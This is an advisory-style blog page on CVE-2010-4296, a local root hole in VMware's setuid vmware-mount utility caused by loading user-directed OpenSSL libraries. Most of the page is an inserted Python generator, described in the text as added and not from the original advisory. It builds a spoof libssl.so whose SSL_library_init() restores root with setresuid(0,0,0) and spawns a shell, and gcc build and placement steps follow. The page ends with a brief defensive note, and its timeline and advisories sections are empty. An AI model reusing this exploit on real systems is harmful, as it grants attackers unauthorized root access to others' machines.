martin carpenter

vmware vmware-mount vulnerability

2010/12/02

tags: linux vmware vmware-mount vulnerability CVE-2010-4296

summary

An attack on the shared-library loading mechanism of the setuid-root vmware-mount utility lets a local attacker gain root privileges. Affects VMware Workstation 6.5 and 7, and VMware Fusion 2.0 and 3.0.

details

vmware-mount is a setuid root utility shipped with a number of VMware products. It reads a per-user configuration file, ~/.vmware, in which a libdir parameter can be set; shared objects are loaded (dlopen()ed) from that directory. In particular, vmware-mount tries to load the OpenSSL libraries (libssl.so, libcrypto.so) by searching libdir first, and then calls functions defined in those libraries (e.g. SSL_library_init()). At this point privileges have not been completely dropped: the saved UID is still zero, so any code running inside the process can call setresuid(0, 0, 0) (or setuid(0)) and get full root back. It is therefore trivial to generate spoof shared objects from the list of exported function symbols of the legitimate libraries, with the function vmware-mount calls replaced by code that restores root and spawns a shell. Running vmware-mount with any two (even invalid) arguments is then enough to gain root.
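The "generate spoof shared objects from the list of exported function symbols" step, as an added example that is not code from the original advisory. It assumes the export list comes from `nm -D --defined-only` (the page does not say how the list was obtained), puts the payload in SSL_library_init(), the function the page names, and uses a hand-constructed sample of nm output; the generated C is a stub for every exported function plus a setresuid(0, 0, 0)-then-shell payload.

```python
"""Build a spoof libssl.so source from the legitimate library's symbol table.

Added example for the attack described above; it is not code from the
original advisory.  Assumptions: `nm -D --defined-only` is used to list the
exports (the page does not say how the symbol list was obtained), the payload
lives in SSL_library_init(), the function the page names, and the sample nm
output below is constructed by hand.
"""
import re
import subprocess
import sys

# Constructed sample of `nm -D --defined-only libssl.so` output; a real
# library exports several hundred symbols.
SAMPLE_NM_OUTPUT = """\
0000000000045c60 T SSL_CTX_new
0000000000046f10 T SSL_library_init
0000000000047a00 T SSL_load_error_strings
0000000000001e60 W SSL_get_version
00000000000b2f80 D SSL_version_str
0000000000000000 A OPENSSL_1.0.0
"""

# "<address> <type> <name>"; the address is absent for some symbol types.
NM_LINE = re.compile(r"^[0-9a-fA-F]*\s*([A-Za-z])\s+(\S+)$")

# Restores root and drops to a shell.  The setresuid() call is exactly what
# a saved UID of zero permits: each target UID only has to equal one of the
# caller's real, effective or saved UIDs.
PAYLOAD = """\
#define _GNU_SOURCE
#include <unistd.h>

static void become_root_shell(void)
{
    if (setresuid(0, 0, 0) == 0 && setresgid(0, 0, 0) == 0)
        execl("/bin/sh", "sh", (char *)0);
}
"""


def exported_functions(nm_output):
    """Return the exported function names from `nm -D --defined-only` text.

    Only code symbols (T, W) are kept.  Data symbols (D, B, R) are skipped:
    a function stub under a variable's name would not satisfy code that
    reads the variable.  Symbol-version suffixes such as `@@OPENSSL_1.0.0`
    are dropped so the stub keeps the plain symbol name.
    """
    names = []
    for line in nm_output.splitlines():
        m = NM_LINE.match(line.strip())
        if m is None:
            continue
        kind, name = m.groups()
        if kind not in "TW":
            continue
        name = name.split("@", 1)[0]
        if name not in names:
            names.append(name)
    return names


def spoof_source(nm_output, entry_symbol="SSL_library_init"):
    """Emit C source for a library exporting every function in nm_output.

    Every stub is `long name(void) { return 0; }`: zero doubles as NULL for
    pointer-returning functions, and the stub ignores whatever arguments the
    caller pushed (harmless on the usual C calling conventions, which is all
    a loader-level attack needs).  entry_symbol carries the payload.
    """
    names = exported_functions(nm_output)
    if entry_symbol not in names:
        raise ValueError(f"{entry_symbol} is not exported by the target library")
    lines = [PAYLOAD]
    for name in names:
        if name == entry_symbol:
            lines.append(f"long {name}(void) {{ become_root_shell(); return 1; }}")
        else:
            lines.append(f"long {name}(void) {{ return 0; }}")
    return "\n".join(lines) + "\n"


def nm_output_for(library_path):
    """Run the real nm against a library on disk (needs binutils)."""
    proc = subprocess.run(["nm", "-D", "--defined-only", library_path],
                          check=True, capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    # Usage: python spoof_ssl.py [/path/to/real/libssl.so] > libssl_spoof.c
    nm_text = nm_output_for(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_NM_OUTPUT
    sys.stdout.write(spoof_source(nm_text))
```

The output is compiled with `gcc -shared -fPIC -o libssl.so libssl_spoof.c` and placed in the directory that libdir in ~/.vmware points at (the page does not give that file's exact syntax); libcrypto.so is spoofed the same way with whichever of its functions vmware-mount calls as the entry symbol. The defensive counterpart is the check the advisory implies: a setuid program must drop all three UIDs (setresuid(uid, uid, uid), not just seteuid) before it dlopen()s anything from a user-controlled path, or simply ignore user-supplied library directories while it still holds any root credential.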

timeline

advisories